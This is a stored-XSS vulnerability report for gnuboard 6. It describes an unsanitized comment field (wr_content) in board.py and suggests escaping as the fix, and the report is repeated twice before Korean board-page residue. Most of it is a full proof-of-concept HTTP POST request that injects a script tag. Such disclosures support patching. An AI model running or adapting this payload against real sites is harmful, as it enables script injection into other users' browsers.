Hello.
Currently, there is a writing vulnerability using the <script> tag when writing Gnubord g6 comments.
### [Name of affected Product]
gnuboard 6
### [Affected version]
https://github.com/gnuboard/g6/commit/f5dd7b84c4bc943c53c3f8b7096de508ae2e7c38
### [Vulnerability Type]
* Stored XSS
### [Affected Component]
board.py, All of posts
### [Root Cause]
* While writing reply on a post, `wr_content` parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.
### [Attack Vectors]
https://github.com/gnuboard/g6/assets/25397908/1eb09079-f94e-4034-842a-b50a1ae32baa
As shown in the video above, the `wr_content` web parameter can be arbitrarily modified using HTML tags when writing, and when the `<script>` tag is inserted, a Stored XSS attack is normally possible.
It seems necessary to check and modify the script tag directly within the `write_update` function in `board.py` or to process HTML escaping.
The below is the PoC Web request.
```
POST /board/write_update/free? HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 1792
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySgFBdm7sWhgsJGVH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/write/free
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogIjhkNzgyMWMwZGI5MzUzZjg4MWFkOTRkZDVmZjJiYzhkIn0=.ZahUdQ.BiPBCxMiQMixJW06yEnmBeE4zGw
Connection: close
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="uid"
2024011717272327
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="parent_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="token"
8d7821c0db9353f881ad94dd5ff2bc8d
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_name"
test
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_password"
tes
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_email"
ttes@naver.com
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_homepage"
tetest
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="html"
html1
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_subject"
set
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_content"
<p>settt</p><script>alert(1)</script>
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="option"
html2
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link1"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link2"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH--
```
Currently, there is a writing vulnerability using the <script> tag when writing Gnubord g6 comments.
### [Name of affected Product]
gnuboard 6
### [Affected version]
https://github.com/gnuboard/g6/commit/f5dd7b84c4bc943c53c3f8b7096de508ae2e7c38
### [Vulnerability Type]
* Stored XSS
### [Affected Component]
board.py, All of posts
### [Root Cause]
* While writing reply on a post, `wr_content` parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.
### [Attack Vectors]
https://github.com/gnuboard/g6/assets/25397908/1eb09079-f94e-4034-842a-b50a1ae32baa
As shown in the video above, the `wr_content` web parameter can be arbitrarily modified using HTML tags when writing, and when the `<script>` tag is inserted, a Stored XSS attack is normally possible.
It seems necessary to check and modify the script tag directly within the `write_update` function in `board.py` or to process HTML escaping.
The below is the PoC Web request.
```
POST /board/write_update/free? HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 1792
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySgFBdm7sWhgsJGVH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/write/free
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogIjhkNzgyMWMwZGI5MzUzZjg4MWFkOTRkZDVmZjJiYzhkIn0=.ZahUdQ.BiPBCxMiQMixJW06yEnmBeE4zGw
Connection: close
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="uid"
2024011717272327
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="parent_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="token"
8d7821c0db9353f881ad94dd5ff2bc8d
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_name"
test
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_password"
tes
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_email"
ttes@naver.com
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_homepage"
tetest
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="html"
html1
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_subject"
set
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_content"
<p>settt</p><script>alert(1)</script>
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="option"
html2
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link1"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link2"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH--
```
댓글 3개
게시글 목록
| 번호 | 제목 |
|---|---|
| 150 | |
| 149 | |
| 148 | |
| 147 | |
| 146 | |
| 145 | |
| 143 | |
| 142 | |
| 141 | |
| 139 | |
| 138 | |
| 136 | |
| 132 | |
| 130 | |
| 128 | |
| 127 | |
| 126 | |
| 125 | |
| 124 | |
| 122 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기